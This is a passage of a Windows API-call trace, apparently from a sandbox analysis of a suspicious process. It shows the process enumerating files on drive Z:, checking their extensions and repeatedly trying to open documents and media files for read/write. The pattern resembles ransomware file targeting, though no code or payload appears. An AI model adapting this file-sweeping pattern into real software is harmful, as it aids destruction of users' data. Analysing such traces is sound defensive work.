cFileName="Khw7ULNZgmj8e7C.ots", cAlternateFileName="")) returned 1 [0187.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.054] PathFindExtensionW (pszPath="Z:\\Khw7ULNZgmj8e7C.ots") returned=".ots" [0187.059] CreateFileW (lpFileName="Z:\\Khw7ULNZgmj8e7C.ots" (normalized: "z:\\khw7ulnzgmj8e7c.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.061] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.061] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13cde, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uKTB42S.swf", cAlternateFileName="")) returned 1 [0187.061] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0187.061] PathFindExtensionW (pszPath="Z:\\uKTB42S.swf") returned=".swf" [0187.065] CreateFileW (lpFileName="Z:\\uKTB42S.swf" (normalized: "z:\\uktb42s.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0187.067] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2667ec80, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xb0b7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="c9ePpp.flv", cAlternateFileName="")) returned 1 [0187.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0187.067] PathFindExtensionW (pszPath="Z:\\c9ePpp.flv") returned=".flv" [0187.071] CreateFileW (lpFileName="Z:\\c9ePpp.flv" (normalized: "z:\\c9eppp.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0187.073] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13285, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRokYgqilEOKg8Z1jJGf.xlsx", cAlternateFileName="")) returned 1 [0187.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0187.073] PathFindExtensionW (pszPath="Z:\\TRokYgqilEOKg8Z1jJGf.xlsx") returned=".xlsx" [0187.077] CreateFileW (lpFileName="Z:\\TRokYgqilEOKg8Z1jJGf.xlsx" (normalized: "z:\\trokygqileokg8z1jjgf.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0187.079] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x99c6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="quhItobo4pfIROy.png", cAlternateFileName="")) returned 1 [0187.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.079] PathFindExtensionW (pszPath="Z:\\quhItobo4pfIROy.png") returned=".png" [0187.083] CreateFileW (lpFileName="Z:\\quhItobo4pfIROy.png" (normalized: "z:\\quhitobo4pfiroy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.084] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x14269, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TkK2vz7hevOC5xNhwJg.mp4", cAlternateFileName="")) returned 1 [0187.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0187.084] PathFindExtensionW (pszPath="Z:\\TkK2vz7hevOC5xNhwJg.mp4") returned=".mp4" [0187.088] CreateFileW (lpFileName="Z:\\TkK2vz7hevOC5xNhwJg.mp4" (normalized: "z:\\tkk2vz7hevoc5xnhwjg.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.090] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0187.090] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26559cf6, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x163c0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8Lx84HE6bsZ.wav", cAlternateFileName="")) returned 1 [0187.090] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.090] PathFindExtensionW (pszPath="Z:\\8Lx84HE6bsZ.wav") returned=".wav" [0187.094] CreateFileW (lpFileName="Z:\\8Lx84HE6bsZ.wav" (normalized: "z:\\8lx84he6bsz.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.096] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1469a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GbsTd6ktJr7.ppt", cAlternateFileName="")) returned 1 [0187.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.096] PathFindExtensionW (pszPath="Z:\\GbsTd6ktJr7.ppt") returned=".ppt" [0187.100] CreateFileW (lpFileName="Z:\\GbsTd6ktJr7.ppt" (normalized: "z:\\gbstd6ktjr7.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.101] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.101] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x8fe9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iN0JFI.xlsx", cAlternateFileName="")) returned 1 [0187.101] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0187.101] PathFindExtensionW (pszPath="Z:\\iN0JFI.xlsx") returned=".xlsx" [0187.105] CreateFileW (lpFileName="Z:\\iN0JFI.xlsx" (normalized: "z:\\in0jfi.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.107] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0187.107] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x8d4d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pbmjHxBll.rtf", cAlternateFileName="")) returned 1 [0187.107] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.107] PathFindExtensionW (pszPath="Z:\\pbmjHxBll.rtf") returned=".rtf" [0187.111] CreateFileW (lpFileName="Z:\\pbmjHxBll.rtf" (normalized: "z:\\pbmjhxbll.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.115] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265500b5, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x54ab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2xLvx0ttbb57lMVLO.ods", cAlternateFileName="")) returned 1 [0187.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0187.115] PathFindExtensionW (pszPath="Z:\\2xLvx0ttbb57lMVLO.ods") returned=".ods" [0187.119] CreateFileW (lpFileName="Z:\\2xLvx0ttbb57lMVLO.ods" (normalized: "z:\\2xlvx0ttbb57lmvlo.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.120] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0187.120] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x18602, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iRSv1LGGODPvwvEebQE.png", cAlternateFileName="")) returned 1 [0187.120] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0187.120] PathFindExtensionW (pszPath="Z:\\iRSv1LGGODPvwvEebQE.png") returned=".png" [0187.125] CreateFileW (lpFileName="Z:\\iRSv1LGGODPvwvEebQE.png" (normalized: "z:\\irsv1lggodpvwveebqe.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.126] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0187.126] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26563936, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1571a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AbOnaFU.xlsx", cAlternateFileName="")) returned 1 [0187.126] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0187.126] PathFindExtensionW (pszPath="Z:\\AbOnaFU.xlsx") returned=".xlsx" [0187.130] CreateFileW (lpFileName="Z:\\AbOnaFU.xlsx" (normalized: "z:\\abonafu.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.131] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0187.131] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xce67, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nFDzD.png", cAlternateFileName="")) returned 1 [0187.131] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0187.131] PathFindExtensionW (pszPath="Z:\\nFDzD.png") returned=".png" [0187.135] CreateFileW (lpFileName="Z:\\nFDzD.png" (normalized: "z:\\nfdzd.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0187.136] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x15e55, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TSbSJ2ohxP3n6KDx.docx", cAlternateFileName="")) returned 1 [0187.136] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0187.136] PathFindExtensionW (pszPath="Z:\\TSbSJ2ohxP3n6KDx.docx") returned=".docx" [0187.140] CreateFileW (lpFileName="Z:\\TSbSJ2ohxP3n6KDx.docx" (normalized: "z:\\tsbsj2ohxp3n6kdx.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.141] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0187.141] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26546475, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x10a4a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0EiP8svF6n.mkv", cAlternateFileName="")) returned 1 [0187.141] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.141] PathFindExtensionW (pszPath="Z:\\0EiP8svF6n.mkv") returned=".mkv" [0187.145] CreateFileW (lpFileName="Z:\\0EiP8svF6n.mkv" (normalized: "z:\\0eip8svf6n.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.146] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.146] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xc4ad, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RS5pLVkA29znz.flv", cAlternateFileName="")) returned 1 [0187.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.147] PathFindExtensionW (pszPath="Z:\\RS5pLVkA29znz.flv") returned=".flv" [0187.150] CreateFileW (lpFileName="Z:\\RS5pLVkA29znz.flv" (normalized: "z:\\rs5plvka29znz.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.152] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.152] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1683c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sYQ0h.ppt", cAlternateFileName="")) returned 1 [0187.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0187.152] PathFindExtensionW (pszPath="Z:\\sYQ0h.ppt") returned=".ppt" [0187.156] CreateFileW (lpFileName="Z:\\sYQ0h.ppt" (normalized: "z:\\syq0h.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.157] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0187.157] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x5e17, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wucW1wawWx4ne.doc", cAlternateFileName="")) returned 1 [0187.157] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.157] PathFindExtensionW (pszPath="Z:\\wucW1wawWx4ne.doc") returned=".doc" [0187.161] CreateFileW (lpFileName="Z:\\wucW1wawWx4ne.doc" (normalized: "z:\\wucw1wawwx4ne.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.162] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26692501, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x14d3a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eiiY7fvtLx3dj.bmp", cAlternateFileName="")) returned 1 [0187.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.162] PathFindExtensionW (pszPath="Z:\\eiiY7fvtLx3dj.bmp") returned=".bmp" [0187.166] CreateFileW (lpFileName="Z:\\eiiY7fvtLx3dj.bmp" (normalized: "z:\\eiiy7fvtlx3dj.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.167] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26546475, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x92e8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1AikB2DT.mp3", cAlternateFileName="")) returned 1 [0187.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0187.167] PathFindExtensionW (pszPath="Z:\\1AikB2DT.mp3") returned=".mp3" [0187.171] CreateFileW (lpFileName="Z:\\1AikB2DT.mp3" (normalized: "z:\\1aikb2dt.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.172] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0187.172] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x121c7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WmEY4gv.mp3", cAlternateFileName="")) returned 1 [0187.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0187.172] PathFindExtensionW (pszPath="Z:\\WmEY4gv.mp3") returned=".mp3" [0187.175] CreateFileW (lpFileName="Z:\\WmEY4gv.mp3" (normalized: "z:\\wmey4gv.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0187.177] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26563936, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17418, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8MxVvSu2W.gif", cAlternateFileName="")) returned 1 [0187.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.177] PathFindExtensionW (pszPath="Z:\\8MxVvSu2W.gif") returned=".gif" [0187.180] CreateFileW (lpFileName="Z:\\8MxVvSu2W.gif" (normalized: "z:\\8mxvvsu2w.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.182] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.182] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, 